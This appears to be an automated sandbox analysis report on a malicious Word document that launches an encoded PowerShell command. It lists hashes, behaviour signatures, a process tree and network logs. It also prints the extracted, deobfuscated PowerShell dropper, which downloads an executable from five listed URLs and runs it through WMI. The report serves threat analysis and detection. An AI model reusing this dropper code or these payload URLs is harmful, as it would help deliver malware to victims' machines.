Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    21/11/2024, 00:28 UTC

General

  • Target

    f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc

  • Size

    168KB

  • MD5

    75bd4b0063bd857bcab72e088adca30e

  • SHA1

    585a121ffbab437dd9043b87e2ace950842e5a06

  • SHA256

    f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0

  • SHA512

    19b7666676481f8dd4edfd68f3b4b1df66536e6fd8e05ea5373c4375f00796dad8b2f8d1fa6d9ecb42bfacee8e0685b4845f937968fe32e9dd08d16e52cdd0ee

  • SSDEEP

    3072:64PrXcuQuvpzm4bkiaMQgAlS8ll4TKCpJynpr7RT:7DRv1m4bnQgIS8lFnpr7RT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# Unused string assignments are obfuscation padding and are kept as extracted.
$daohjouthwoiz = "heamhep"
# Permit TLS 1.2/1.1/1.0 so the download works against any of the listed hosts
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
$kiodmoag = "851"
$xaitxaugvaexroich = "veepboofpooqu"
# Drop path under the user profile: <profile>\\851.exe (doubled backslash is in the original)
$jeolwaiqujoud = $env:userprofile + "\\" + $kiodmoag + ".exe"
$geucthaudgurheud = "boojhiltheib"
$keupfaikthuus = new-object net.webclient
# Candidate payload URLs, tried in order until one yields a large enough file
$maogzoegchuuk = "http://houseofgriffin.org/weblog/v76/", "http://hohwy.com/cgi-bin/Bv8y33Cmr/", "http://lidermuebles.com.ar/cgi-bin/wz4rxd/", "http://106.52.87.250:81/wp-admin/T3B09Z/", "http://duhocjk.vn/wp-admin/51f73u/"
$cuudbuahdiom = "wowtiavnual"
foreach ($boinleerxun in $maogzoegchuuk) {
    try {
        $keupfaikthuus.downloadfile($boinleerxun, $jeolwaiqujoud)
        $duawquootchiaw = "kiaflaidlaek"
        # Size check: a response under 33618 bytes (for example an error page) is not run and the next URL is tried
        if ((get-item $jeolwaiqujoud).length -ge 33618) {
            # Launch the dropped file via WMI Win32_Process.Create, then stop iterating
            ([wmiclass]"win32_Process").create($jeolwaiqujoud)
            $haucjaixkoawfeuj = "keojxuc"
            break
            $wianmachtocdooj = "geemlihzeab"
        }
    } catch {

URLs
exe.dropper: http://houseofgriffin.org/weblog/v76/
exe.dropper: http://hohwy.com/cgi-bin/Bv8y33Cmr/
exe.dropper: http://lidermuebles.com.ar/cgi-bin/wz4rxd/
exe.dropper: http://106.52.87.250:81/wp-admin/T3B09Z/
exe.dropper: http://duhocjk.vn/wp-admin/51f73u/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f1e1c0a73518f3ca584e90f162a224514a1a8a31d0b625f44e2c7ab878b715a0.doc"
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2572
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
        PID:1668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e <base64-encoded command removed>
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2100

    Network

    • [US] DNS houseofgriffin.org (powersheLL.exe; remote address 8.8.8.8:53)
      Request: houseofgriffin.org IN A
      Response: houseofgriffin.org IN A 74.114.89.87
    • [US] GET http://houseofgriffin.org/weblog/v76/ (powersheLL.exe; remote address 74.114.89.87:80)
      Request
      GET /weblog/v76/ HTTP/1.1
      Host: houseofgriffin.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Nov 2024 00:28:50 GMT
      Server: Apache
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      X-Redirect-By: WordPress
      TT-Server: t=1732148930595180 D=24839
      Location: http://www.houseofgriffin.org/weblog/v76/
      Content-Length: 0
      Keep-Alive: timeout=10, max=20
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • [US] DNS www.houseofgriffin.org (powersheLL.exe; remote address 8.8.8.8:53)
      Request: www.houseofgriffin.org IN A
      Response: www.houseofgriffin.org IN A 74.114.89.87
    • [US] GET http://www.houseofgriffin.org/weblog/v76/ (powersheLL.exe; remote address 74.114.89.87:80)
      Request
      GET /weblog/v76/ HTTP/1.1
      Host: www.houseofgriffin.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Server: Apache
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.houseofgriffin.org/wp-json/>; rel="https://api.w.org/"
      TT-Server: t=1732148931019768 D=34652
      Keep-Alive: timeout=10, max=20
      Connection: Keep-Alive
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • [US] DNS hohwy.com (powersheLL.exe; remote address 8.8.8.8:53)
      Request: hohwy.com IN A
      Response: hohwy.com IN A 81.169.145.77
    • [DE] GET http://hohwy.com/cgi-bin/Bv8y33Cmr/ (powersheLL.exe; remote address 81.169.145.77:80)
      Request
      GET /cgi-bin/Bv8y33Cmr/ HTTP/1.1
      Host: hohwy.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Server: Apache/2.4.62 (Unix)
      Vary: User-Agent
      Last-Modified: Wed, 27 Jul 2022 11:55:26 GMT
      ETag: "128a-5e4c817b6c780"
      Accept-Ranges: bytes
      Content-Length: 4746
      Keep-Alive: timeout=3, max=100
      Connection: Keep-Alive
      Content-Type: text/html
    • [US] DNS lidermuebles.com.ar (powersheLL.exe; remote address 8.8.8.8:53)
      Request: lidermuebles.com.ar IN A
      Response: lidermuebles.com.ar IN A 172.67.194.140
                lidermuebles.com.ar IN A 104.21.92.141
    • [US] GET http://lidermuebles.com.ar/cgi-bin/wz4rxd/ (powersheLL.exe; remote address 172.67.194.140:80)
      Request
      GET /cgi-bin/wz4rxd/ HTTP/1.1
      Host: lidermuebles.com.ar
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Nov 2024 00:28:51 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Thu, 21 Nov 2024 01:28:51 GMT
      Location: https://lidermuebles.com.ar/cgi-bin/wz4rxd/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNYTa06kjEfMu9zGaJWYzEVf0m9tgVVwSDtukTnTrZbiJeCgbMisaJVmmxvX%2BooJS2%2BINYkWf1rd7C7XdZkg69RGhbNK%2FbSfXGe5onrwDaYf3FDIFlgdKDj2T8n%2FmcTdE%2BtIGcNQ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8fe70d12ef2b-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=39071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    • [US] GET https://lidermuebles.com.ar/cgi-bin/wz4rxd/ (powersheLL.exe; remote address 172.67.194.140:443)
      Request
      GET /cgi-bin/wz4rxd/ HTTP/1.1
      Host: lidermuebles.com.ar
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Date: Thu, 21 Nov 2024 00:28:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie,User-Agent
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://lidermuebles.com.ar/wp-json/>; rel="https://api.w.org/"
      Location: https://lidermuebles.com.ar/
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eM5ukKPeYbwsXc3AITazLVMVe5tXHQm7ilLiGX0N4Gn%2BLeznJLZx0AbqgrRVLAGJpXQme%2Bc8S9CYTVA%2FDpUoVUUBd7EceLcqQUssBOEsj9iYeIhSkBG6Me5bFRi5UW2R86gHN66l"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8fea6df97777-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=51542&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=374&delivery_rate=81238&cwnd=253&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1699&x=0"
    • [US] GET https://lidermuebles.com.ar/ (powersheLL.exe; remote address 172.67.194.140:443)
      Request
      GET / HTTP/1.1
      Host: lidermuebles.com.ar
      Response
      HTTP/1.1 200 OK
      Date: Thu, 21 Nov 2024 00:28:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie,User-Agent
      Cache-Control: max-age=3, must-revalidate
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=983aaw2hCtTxrrAL%2FYYVCPrIKWWcbvv%2FdMQ9%2FeRUgnHJhG7gqC4pAznES%2FnShXiDmX9Q%2F%2Bm3FiIKLq%2FRwmyttCf9c9OCeyjTa5aW2VcmZ5cWmkNygkVnO1gJXimj1VfOMc7Lg7jV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8e5c8ff43d6e7777-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=50158&sent=8&recv=7&lost=0&retrans=0&sent_bytes=3927&recv_bytes=459&delivery_rate=81238&cwnd=254&unsent_bytes=0&cid=4a2e65ab43fe9ee0&ts=1986&x=0"
    • 74.114.89.87:80 http://houseofgriffin.org/weblog/v76/ (http, powersheLL.exe)
      sent 309 B / 5 packets, received 575 B / 3 packets
      HTTP Request: GET http://houseofgriffin.org/weblog/v76/
      HTTP Response: 301
    • 74.114.89.87:80 http://www.houseofgriffin.org/weblog/v76/ (http, powersheLL.exe)
      sent 865 B / 17 packets, received 33.4kB / 26 packets
      HTTP Request: GET http://www.houseofgriffin.org/weblog/v76/
      HTTP Response: 404
    • 81.169.145.77:80 http://hohwy.com/cgi-bin/Bv8y33Cmr/ (http, powersheLL.exe)
      sent 353 B / 6 packets, received 5.3kB / 6 packets
      HTTP Request: GET http://hohwy.com/cgi-bin/Bv8y33Cmr/
      HTTP Response: 200
    • 172.67.194.140:80 http://lidermuebles.com.ar/cgi-bin/wz4rxd/ (http, powersheLL.exe)
      sent 314 B / 5 packets, received 1.2kB / 3 packets
      HTTP Request: GET http://lidermuebles.com.ar/cgi-bin/wz4rxd/
      HTTP Response: 301
    • 172.67.194.140:443 https://lidermuebles.com.ar/ (tls, http, powersheLL.exe)
      sent 2.1kB / 35 packets, received 62.5kB / 58 packets
      HTTP Request: GET https://lidermuebles.com.ar/cgi-bin/wz4rxd/
      HTTP Response: 302
      HTTP Request: GET https://lidermuebles.com.ar/
      HTTP Response: 200
    • 8.8.8.8:53 houseofgriffin.org (dns, powersheLL.exe)
      sent 64 B / 1 packet, received 80 B / 1 packet
      DNS Request: houseofgriffin.org
      DNS Response: 74.114.89.87
    • 8.8.8.8:53 www.houseofgriffin.org (dns, powersheLL.exe)
      sent 68 B / 1 packet, received 84 B / 1 packet
      DNS Request: www.houseofgriffin.org
      DNS Response: 74.114.89.87
    • 8.8.8.8:53 hohwy.com (dns, powersheLL.exe)
      sent 55 B / 1 packet, received 71 B / 1 packet
      DNS Request: hohwy.com
      DNS Response: 81.169.145.77
    • 8.8.8.8:53 lidermuebles.com.ar (dns, powersheLL.exe)
      sent 65 B / 1 packet, received 97 B / 1 packet
      DNS Request: lidermuebles.com.ar
      DNS Response: 172.67.194.140, 104.21.92.141

    MITRE ATT&CK Enterprise v15

    Downloads

    • memory/2100-44-0x000000001B310000-0x000000001B5F2000-memory.dmp (2.9MB)
    • memory/2100-45-0x0000000001FC0000-0x0000000001FC8000-memory.dmp (32KB)
    • memory/2572-6-0x0000000000670000-0x0000000000770000-memory.dmp (1024KB)
    • memory/2572-38-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-0-0x000000002F051000-0x000000002F052000-memory.dmp (4KB)
    • memory/2572-8-0x0000000006090000-0x0000000006190000-memory.dmp (1024KB)
    • memory/2572-14-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-9-0x0000000000670000-0x0000000000770000-memory.dmp (1024KB)
    • memory/2572-23-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-32-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-37-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-7-0x0000000000670000-0x0000000000770000-memory.dmp (1024KB)
    • memory/2572-2-0x000000007186D000-0x0000000071878000-memory.dmp (44KB)
    • memory/2572-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
    • memory/2572-46-0x000000007186D000-0x0000000071878000-memory.dmp (44KB)
    • memory/2572-47-0x0000000000670000-0x0000000000770000-memory.dmp (1024KB)
    • memory/2572-49-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-50-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
    • memory/2572-52-0x0000000006380000-0x0000000006480000-memory.dmp (1024KB)
